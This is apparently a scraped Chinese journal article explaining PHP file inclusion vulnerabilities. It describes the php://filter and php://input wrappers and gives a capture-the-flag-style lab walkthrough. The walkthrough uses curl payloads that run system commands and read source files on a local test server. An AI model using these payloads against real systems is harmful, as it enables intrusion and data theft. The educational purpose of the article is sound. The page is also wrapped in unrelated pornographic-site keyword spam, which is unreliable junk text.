亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        PHP文件包含漏洞分析

        2020-05-26 02:03:34魯先志柏海龍周均
        卷宗 2020年8期
        關鍵詞:漏洞

        魯先志 柏海龍 周均

        摘 要:文件包含漏洞是PHP語言開發(fā)的web系統(tǒng)中普遍存在的一類漏洞,本文分析了文件包含漏洞的原理,設計一個實驗案例展示文件包含漏洞的利用過程。

        關鍵詞:漏洞;PHP語言;web系統(tǒng)

        PHP語言開發(fā)的WEB系統(tǒng)程序有著快速開發(fā)快速部署,系統(tǒng)開發(fā)實施周期短的優(yōu)勢,但PHP語言開發(fā)的WEB系統(tǒng)也普遍存在一些典型的漏洞,如:跨站腳本漏洞、SQL注入漏洞、代碼執(zhí)行漏洞、文件包含漏洞及PHP代碼注入漏洞等[1]。

        1 文件包含基本概念

        文件包含漏洞主要是基于PHP語言的web應用程序中發(fā)生的。程序員寫程序時將公用代碼寫在單獨的文件中,然后其他函數(shù)需要使用該代碼時直接包含調(diào)用[2]。嚴格來說,文件包含漏洞是“代碼注入”的一種。“代碼注入”這種攻擊,其原理就是注入一段用戶能控制的腳本或代碼,并讓服務器端執(zhí)行?!按a注入”的典型代碼就是文件包含,可以理解為“外部數(shù)據(jù)流包含”,至于這個外部數(shù)據(jù)流是什么,可以是文件,也可以是POST數(shù)據(jù)流的形式。

        2 PHP的封裝協(xié)議(偽協(xié)議)

        php漏洞利用中常用偽協(xié)議為以下兩種:

        ①php://filter--對本地磁盤文件進行讀寫,改協(xié)議經(jīng)常用來讀取源代碼并進行base64編碼輸出,不然會直接源代碼會當做php代碼執(zhí)行就看不到源代碼內(nèi)容。

        條件:allow_url_fopen :off/on? allow_url_include:off/on

        用法:php://filter/convert.base64-encode/resource=a.php

        //將a.php源代碼以base64編碼輸出

        ②php://input 可以訪問請求的原始數(shù)據(jù)的只讀流,將post請求中的數(shù)據(jù)作為PHP代碼執(zhí)行。

        條件:allow_url_fopen :off/on? ? allow_url_include:on

        用法:http://127.0.0.1/cmd.php?file=php://input

        [POST DATA] <?php phpinfo()?>//執(zhí)行phpinfo函數(shù)

        除了以上的協(xié)議以外,php支持的還有以下封裝協(xié)議(其中常用為data與ftp協(xié)議):file:// http:// ftp:// php:// zlib:// glob:// phar:// ssh2:// rar:// ogg:// expect://

        3 php文件包含漏洞的實現(xiàn)

        本實驗搭建了一個具有PHP文件包含漏洞的web系統(tǒng),通過使用的工具是Linux系統(tǒng)下的curl命令,實現(xiàn)對目標服務器127.0.0.1:7521的滲透,并成功獲取到系統(tǒng)的敏感信息。

        1.通過curl命令訪問目標網(wǎng)址:curl 127.0.0.1:7521

        2.上圖顯示了目標系統(tǒng)的網(wǎng)頁源碼和兩項php配置

        1.源代碼中有include函數(shù),并且存在未過濾的可控參數(shù)path,此處存在有文件包含漏洞的風險。

        2.系統(tǒng)中有兩項文件包含的相關配置,allow_url_fopen為off,allow_url_include為on,遠程文件包含需要allow_url_fopen為on,所以無法進行直接包含遠程文件,達到getshell

        3.PHP配置項allow_url_include為on,所以可以通過相關偽協(xié)議達到文件讀取與命令執(zhí)行的目的,data協(xié)議需要兩項都為on,此處使用php://filter和php://input達到目的。

        4.通過命令執(zhí)行讀取本地文件

        通過可控的path參數(shù),利用php://input,注入php的命令執(zhí)行語句,來達到命令執(zhí)行。(此處使用system函數(shù)),通過curl發(fā)送如下包

        curl -d “<?php system(ls); ?>”/

        http://127.0.0.1/index.php?path=php://input

        5.查看返回的數(shù)據(jù)中,標簽后有我們執(zhí)行后的結果。此處有三個文件,可以猜測出flag應該在f10g.php文件中。

        6.訪問f10g.php? curl http://127.0.0.1:7521/f10g.php

        7.通過php://filter讀取f10g.php源代碼

        curl \

        http://127.0.0.1:7521/index.php?path=php://filter/convert.base64-encode/resource=f10g.php

        返回的數(shù)據(jù)中標簽后有base64編碼后的顯示有源代碼數(shù)據(jù),可以通過base64解碼來查看源代碼

        4 小結

        本次的滲透測試案例展示了一個簡單的PHP文件上傳漏洞并利用該漏洞獲取到系統(tǒng)的敏感數(shù)據(jù)。我們在實際的滲透過程中可以通過多種方式來利用該漏洞,根據(jù)系統(tǒng)環(huán)境中PHP配置文件和服務器配置的不同來靈活利用該漏洞,比如可以利用php://input來寫入一句話木馬,也可以直接讀取關鍵配置文件,還可以通過php://input執(zhí)行系統(tǒng)命令。

        參考文獻

        [1]劉鵬,張玉清常見安全漏洞攻防研究[J].信息網(wǎng)絡安全,2011(07)33-36.

        [2]周開東等.遠程文件包含漏洞分級檢測工具研究[J].計算機應用與軟件,2014(02)21-23.

        [3]趙潤梓.基于WEB滲透的自動化文件上傳漏洞檢測工具實現(xiàn)[J].網(wǎng)絡全,2020(03)27-28.

        猜你喜歡
        漏洞
        漏洞
        網(wǎng)絡安全漏洞管理與漏洞情報庫建設方案探討及研究
        漏洞在哪里
        基于selenium的SQL注入漏洞檢測方法
        電子制作(2019年11期)2019-07-04 00:34:40
        Windows 10被曝新零日漏洞涉及3大版本
        偵探推理游戲(二)
        三明:“兩票制”堵住加價漏洞
        漏洞在哪兒
        兒童時代(2016年6期)2016-09-14 04:54:43
        Java 反序列化漏洞研究
        高鐵急救應補齊三漏洞
        永久无码在线观看| 亚洲av色影在线| 91日韩东京热中文字幕| 国内揄拍国内精品少妇| 成熟丰满熟妇高潮xxxxx| 在线精品国内视频秒播| 在线免费观看视频播放| 国产tv不卡免费在线观看| 狠狠色噜噜狠狠狠777米奇小说| 66lu国产在线观看| 91在线无码精品秘 入口九色十| 国产精品熟女视频一区二区三区 | 美女扒开大腿让男人桶| 韩国无码av片在线观看网站| 精品一区二区三区免费爱| 久久精品国产亚洲av成人擦边 | 无码国产精品第100页| 亚洲一区二区三区毛片| 久久久精品人妻一区二区三区四区| 日本老熟妇50岁丰满| 欧美日韩精品一区二区在线视频 | 中文字幕一区二区三区久久网站| 美女被射视频在线观看91| 一区二区三区在线视频观看 | 久久久国产熟女综合一区二区三区| 欧美人与动性xxxxx杂性| 亚洲色欲色欲综合网站| 国产羞羞视频在线观看| 偷拍av一区二区三区| 成人一区二区三区国产| 国产国产裸模裸模私拍视频| 国产黄色片在线观看| 无码专区亚洲avl| 在线视频自拍视频激情| 国产极品女主播国产区| 无码国产精品一区二区免费16| 亚洲妇女av一区二区| 色中文字幕在线观看视频| av潮喷大喷水系列无码| 97av在线播放| 久久精品亚洲熟女av麻豆|